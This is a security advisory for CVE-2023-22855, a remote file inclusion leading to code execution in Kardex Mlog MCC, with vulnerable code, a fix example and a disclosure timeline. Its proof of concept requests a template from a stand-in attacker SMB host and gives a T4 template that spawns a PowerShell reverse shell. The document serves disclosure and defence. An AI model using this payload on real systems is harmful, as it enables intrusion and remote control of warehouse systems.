Kardex Mlog MCC 5.7.12+0-a203c2a213-master File Inclusion / Remote Code Execution
Posted Feb 17, 2023
Authored by Patrick Hener, Nico Viakowski | Site hesec.de

Kardex Mlog MCC version 5.7.12+0-a203c2a213-master suffers from a file inclusion vulnerability that allows for remote code execution.

tags | exploit, remote, code execution, file inclusion
advisories | CVE-2023-22855
SHA-256 | 960e6d130eb7b30180562e91395b84ea4b20026b7ec3c0ea3b55a62820151341

Remote Code Execution in Kardex MLOG
=======================================================================
Product: Kardex Mlog MCC
Vendor: Kardex Holding AG
Tested Version: 5.7.12+0-a203c2a213-master
Fixed Version: inline patch - no new version number
Vulnerability Type: Improper Control of Generation of Code ("RFI") - CWE-94
CVSSv2 Severity: AV:A/AC:L/Au:N/C:C/I:C/A:C - Score 8.3
CVSSv3 Severity: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - Score 9.6
Solution Status: fixed
Manufacturer Notification: 2022-12-13
Solution Date: 2023-01-24
Public Disclosure: 2023-02-07
CVE Reference: CVE-2023-22855
Authors of Advisory: Patrick Hener & Nico Viakowski

=======================================================================

Vendor description[1]
---------------------

Kardex Mlog’s modular software solution Kardex Control Center manages material
flow and warehouse management processes faster and more efficiently.

From manual block warehouse and interface networking with intelligent partner
systems to an automated intralogistics system connected to production lines and
driverless vehicles, intelligent energy management for the automated stacker
cranes and modern system visualization, the Kardex Control Center modules offer
flexible solutions for your warehouse management.

Vulnerability Details
---------------------

The .NET-based software spawns a web interface listening on port 8088.
This interface is meant to control and monitor the material flow.

The user-controllable request path is handed to a path concatenation function
(`Path.Combine`) without proper sanitization. This makes it possible to
include local files as well as remote files (via SMB). The path is used in a
function called `GetFile`.

The following code snippet shows the vulnerable part of this function:

```cs
public MccHttpServerResult GetFile(string path, string acceptEncoding, string queryString = null)
{
    MccHttpServerResult result4;

    [... snip ...]

    else
    {
        // "/" maps to index.html; any other request path has its leading "/"
        // stripped and the remaining "/" characters replaced, but nothing
        // rejects "..", drive letters or a leading "\\" (UNC prefix).
        string getfileName = (path == "/") ? "index.html" : path.Substring(1).Replace("/", Path.DirectorySeparatorChar.ToString(CultureInfo.InvariantCulture));
        // Path.Combine returns its second argument unchanged when that argument
        // is rooted, so a UNC path here replaces RootDirectory() entirely.
        string fileName = Path.Combine(this.RootDirectory(), getfileName);
        string originalFileName = fileName;
```

The .NET function `Path.Combine` also accepts remote targets: when its second
argument is a rooted path, it is returned as-is and the root directory is
discarded. A request path starting with `\\ipaddress` therefore becomes a UNC
path, and files can be included from a remote Samba server.

Further down the request flow, the application checks the MIME type of the
retrieved file.

Depending on the MIME type, the content is either sent through an
import/export procedure or rendered as a `mono/t4` template. The function
`getMimeType` returns `t4` if the name of the included file ends with the
extension `.t4`.

This is where the file inclusion can be escalated to remote code execution.
The `mono/t4` templating engine allows embedded `C#` code to be evaluated.
This enables an attacker to gain code execution and eventually spawn a reverse
shell.

```cs
bool flag15 = File.Exists(fileName);   // also true for a reachable UNC path
if (flag15)
{
    using (FileStream f = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
    {
        byte[] bytes = new byte[f.Length];
        f.Read(bytes, 0, bytes.Length);
        // mime2 is derived from the file extension alone, so any ".t4" file the
        // request selects, local or remote, is handed to the template engine.
        bool flag16 = mime2 == "t4";
        if (flag16)
        {
            return this.runTemplatingEngine(bytes, responseHeaders, queryString);
        }
```

Proof of Concept (PoC)
----------------------

The following request will include a remote file from an SMB share. For this to
work, the attacker has to spawn an SMB server (for example using `smbserver.py`
from Impacket[2]).

```http
GET /\\attacker-ip/share/exploit.t4 HTTP/1.1
Host: vulnerable.host.internal:8088
Content-Type: text/html
User-Agent: curl/7.86.0
Accept: */*
Connection: close
```

The `exploit.t4` looks like this:

```html
<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>

Proof of Concept - SSTI to RCE
RCE running ...

<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e revshell-base64-blob";

proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>

Enjoy your shell, good sir :D
```

The exploit above will execute `cmd.exe` and launch a `powershell` to execute
a reverse shell. You can easily generate a reverse shell blob using
revshells.com[3].

A full exploit spawning a reverse shell was created[4].

Solution
--------

The user-supplied request path should be validated and sanitized before it is
passed to the `Path.Combine` function.
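As an added example (not Kardex code and not part of the original advisory), the following C# shows how the path handling described in the Vulnerability Details section could be hardened along the lines of this Solution: rooted paths and backslashes are rejected, the result is canonicalised and confirmed to lie below the root directory, and only an allow-listed set of static extensions is served, so a request can never select a `.t4` template. The class name `SafeStaticFiles`, the method `ResolveRequestPath`, the sample root directory and the extension allow-list are assumptions, and the path semantics are those of .NET on Windows, the product's platform.

```csharp
using System;
using System.IO;

// Added example, not vendor code: hardened replacement for the path handling
// in GetFile. The root directory and request paths below are constructed samples.
public static class SafeStaticFiles
{
    // Extensions the static handler may serve; template files are deliberately absent.
    private static readonly string[] Allowed = { ".html", ".css", ".js", ".png", ".svg", ".ico" };

    // Returns the absolute path of the requested file inside rootDirectory,
    // or null when the request must be rejected (e.g. with 400 or 404).
    public static string ResolveRequestPath(string rootDirectory, string requestPath)
    {
        if (string.IsNullOrEmpty(requestPath) || requestPath[0] != '/')
            return null;
        string relative = requestPath == "/" ? "index.html" : requestPath.Substring(1);

        // 1. Only plain relative paths are accepted. The original code merely
        //    replaced "/", so "\\attacker-ip\share\exploit.t4" stayed rooted and
        //    Path.Combine returned it unchanged, discarding RootDirectory().
        if (relative.Contains("\\") || relative.Contains(":") || Path.IsPathRooted(relative))
            return null;

        // 2. Canonicalise and confirm the result is still below the root; this
        //    also defeats "../" traversal, which step 1 does not catch.
        string root = Path.GetFullPath(rootDirectory).TrimEnd(Path.DirectorySeparatorChar)
                      + Path.DirectorySeparatorChar;
        string full = Path.GetFullPath(Path.Combine(root, relative));
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            return null;

        // 3. The request must not choose how content is handled: ".t4" is not in
        //    the allow-list, so a template file never reaches the template engine.
        if (Array.IndexOf(Allowed, Path.GetExtension(full).ToLowerInvariant()) < 0)
            return null;
        return full;
    }

    public static void Main()
    {
        string root = @"C:\Mlog\www"; // constructed sample root directory
        Console.WriteLine(ResolveRequestPath(root, "/index.html") ?? "rejected");
        Console.WriteLine(ResolveRequestPath(root, @"/\\attacker-ip/share/exploit.t4") ?? "rejected");
        Console.WriteLine(ResolveRequestPath(root, "/../../Windows/win.ini") ?? "rejected");
        Console.WriteLine(ResolveRequestPath(root, "/templates/report.t4") ?? "rejected");
    }
}
```

Only the first request resolves to a file under the root; the UNC, traversal and `.t4` requests are all rejected before any file is opened.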

Disclosure Timeline
-------------------

2022-12-13: Vulnerability discovered
2022-12-13: Vulnerability reported to manufacturer
2023-01-24: Solution provided by manufacturer
2023-02-07: Public disclosure of vulnerability


References
----------

[1] Vendor Website: https://www.kardex.com/en/mlog-control-center
[2] Impacket Git Repository: https://github.com/SecureAuthCorp/impacket
[3] Reverse Shell Generator: https://www.revshells.com/
[4] Exploit on Exploit-DB (tbd): https://www.exploit-db.com/exploits/xxxxx
[5] Blog Post Advisory: https://hesec.de/posts/cve-2023-22855
[6] Personal Github Repo for Advisory: https://github.com/patrickhener/CVE-2023-22855
[7] Blog Post Thinking Objects: https://to.com/blog/advisory-kardex-mlog-CVE-2023-22855

Credits
-------

This security vulnerability was found by Patrick Hener and Nico Viakowski.

E-Mail: patrickhener@posteo.de
E-Mail: n.viakowski@pm.me

Disclaimer
----------

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible.

Copyright
---------

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
